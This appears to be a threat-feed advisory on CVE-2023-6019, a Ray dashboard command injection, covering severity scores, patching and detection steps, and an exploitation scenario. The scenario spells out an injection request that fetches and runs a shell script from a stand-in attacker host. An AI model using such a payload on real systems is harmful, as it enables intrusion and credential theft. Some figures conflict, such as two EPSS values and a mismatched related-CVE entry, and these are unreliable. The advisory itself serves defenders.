AI Threat Alert

CVE-2023-6019: Ray: unauthenticated RCE via dashboard command injection

GHSA-h3xg-wv58-5p43 CRITICAL PoC AVAILABLE
Published November 16, 2023
CISO Take

An unauthenticated attacker with network access to the Ray dashboard (port 8265) can execute arbitrary OS commands on your ML cluster head node with zero prerequisites. With an EPSS of 0.887, this is near-certain to be exploited in the wild — patch to Ray 2.8.1 immediately or firewall the dashboard. Any Ray cluster reachable from untrusted networks is fully compromised until remediated.

What is the risk?

Severity is maximum for any organization running Ray. CVSS 9.8 combined with EPSS 0.887 places this in the top tier of exploitability — no authentication, no user interaction, network-accessible attack vector. Ray head nodes typically hold GPU credentials, cloud IAM tokens, training data access, and model artifacts, making post-exploitation blast radius extremely high. Exposure risk is elevated because ML engineers routinely expose Ray dashboards on internal networks or even public cloud IPs without additional auth layers.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Ray pip < 2.8.1 2.8.1
42.9K OpenSSF 5.7 873 dependents Pushed 2d ago 83% patched ~139d to patch Full package profile →

Do you use Ray? You're affected.

How severe is it?

CVSS 3.1
9.8 / 10
EPSS
74.6%
chance of exploitation in 30 days
Higher than 99% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Weaponized Metasploit module (exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019)
Exploit published in Exploit-DB
EPSS exploit prediction: 75%
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

What should I do?

5 steps

  1. PATCH

    Upgrade Ray to >= 2.8.1 immediately (pip install 'ray>=2.8.1').

  2. NETWORK

    If patching is not immediately possible, block all external access to Ray dashboard (default port 8265) and GCS server (port 6379) via firewall or security group rules — restrict to trusted internal CIDR only.

  3. AUTH PROXY

    Place Ray dashboard behind an authenticating reverse proxy (e.g., OAuth2 Proxy, Nginx + htpasswd) as a defense-in-depth measure even post-patch.

  4. DETECT

    Monitor for anomalous process spawning from the Ray dashboard process (PID tree analysis), unusual outbound connections from Ray head nodes, and unexpected credential access in cloud provider audit logs.

  5. AUDIT

    Review cloud IAM roles attached to Ray head node instances and apply least privilege — assume credentials were compromised if running vulnerable versions in any networked environment.

How is it classified?

Code Execution Auth Bypass Supply Chain Framework Inference Training Data AML.T0006 AML.T0025 AML.T0049 AML.T0050 AML.T0055 AML.T0072

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.2.3 - Vulnerability and patch management for AI lifecycle A.9.3 - Information security for AI systems
NIST AI RMF
GOVERN 1.4 - Organizational teams committed to AI risk management MANAGE 2.2 - Mechanisms exist to sustain appropriate responses to AI risks
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2023-6019?

An unauthenticated attacker with network access to the Ray dashboard (port 8265) can execute arbitrary OS commands on your ML cluster head node with zero prerequisites. With an EPSS of 0.887, this is near-certain to be exploited in the wild — patch to Ray 2.8.1 immediately or firewall the dashboard. Any Ray cluster reachable from untrusted networks is fully compromised until remediated.

Is CVE-2023-6019 actively exploited?

A weaponized Metasploit module (exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) exists for CVE-2023-6019, meaning the exploit is point-and-click and the risk of opportunistic exploitation is high.

How to fix CVE-2023-6019?

1. PATCH: Upgrade Ray to >= 2.8.1 immediately (`pip install 'ray>=2.8.1'`). 2. NETWORK: If patching is not immediately possible, block all external access to Ray dashboard (default port 8265) and GCS server (port 6379) via firewall or security group rules — restrict to trusted internal CIDR only. 3. AUTH PROXY: Place Ray dashboard behind an authenticating reverse proxy (e.g., OAuth2 Proxy, Nginx + htpasswd) as a defense-in-depth measure even post-patch. 4. DETECT: Monitor for anomalous process spawning from the Ray dashboard process (PID tree analysis), unusual outbound connections from Ray head nodes, and unexpected credential access in cloud provider audit logs. 5. AUDIT: Review cloud IAM roles attached to Ray head node instances and apply least privilege — assume credentials were compromised if running vulnerable versions in any networked environment.

What systems are affected by CVE-2023-6019?

This vulnerability affects the following AI/ML architecture patterns: distributed training pipelines, model serving, MLOps platforms, hyperparameter optimization pipelines, AI/ML compute clusters.

What is the CVSS score for CVE-2023-6019?

CVE-2023-6019 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 74.63%.

What is the AI security impact?

Affected AI Architectures

distributed training pipelinesmodel servingMLOps platformshyperparameter optimization pipelinesAI/ML compute clusters

MITRE ATLAS Techniques

AML.T0006 Active Scanning
AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0055 Unsecured Credentials
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: A.6.2.3, A.9.3
NIST AI RMF: GOVERN 1.4, MANAGE 2.2
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.

Exploitation Scenario

Attacker scans for exposed Ray dashboards on port 8265 (trivially discoverable via Shodan or internal network scan). Sends a crafted GET request to the `/cpu_profile` endpoint with a command injection payload in the `ip` parameter — e.g., `GET /cpu_profile?ip=127.0.0.1;curl+attacker.com/shell.sh|bash`. No authentication token, API key, or session cookie required. The dashboard executes the OS command in the context of the Ray process (often running as root or a privileged service account). Attacker establishes a reverse shell on the head node, extracts cloud credentials from instance metadata (AWS IMDSv1, GCP metadata endpoint), pivots to all Ray worker nodes, exfiltrates model weights and training datasets, and optionally injects poisoned code into the training pipeline for persistent access or model integrity compromise.

Weaknesses (CWE)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Primary

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
November 16, 2023
Last Modified
January 9, 2025
First Seen
March 24, 2026

Related Vulnerabilities

CRITICAL CVE-2023-48022 9.8

Ray: unauthenticated RCE via job submission API

Same package: ray
CRITICAL CVE-2023-6020 9.3

Ray: unauthenticated LFI exposes entire filesystem

Same package: ray
CRITICAL CVE-2023-6021 9.3

Ray: LFI allows unauthenticated file read

Same package: ray
HIGH CVE-2026-32981 7.5

Ray Dashboard: unauthenticated path traversal file read

Same package: ray
MEDIUM CVE-2026-54683 6.5

nl-portal documenten-api: IDOR exposes citizen documents

Same package: ray
Back to Threat Feed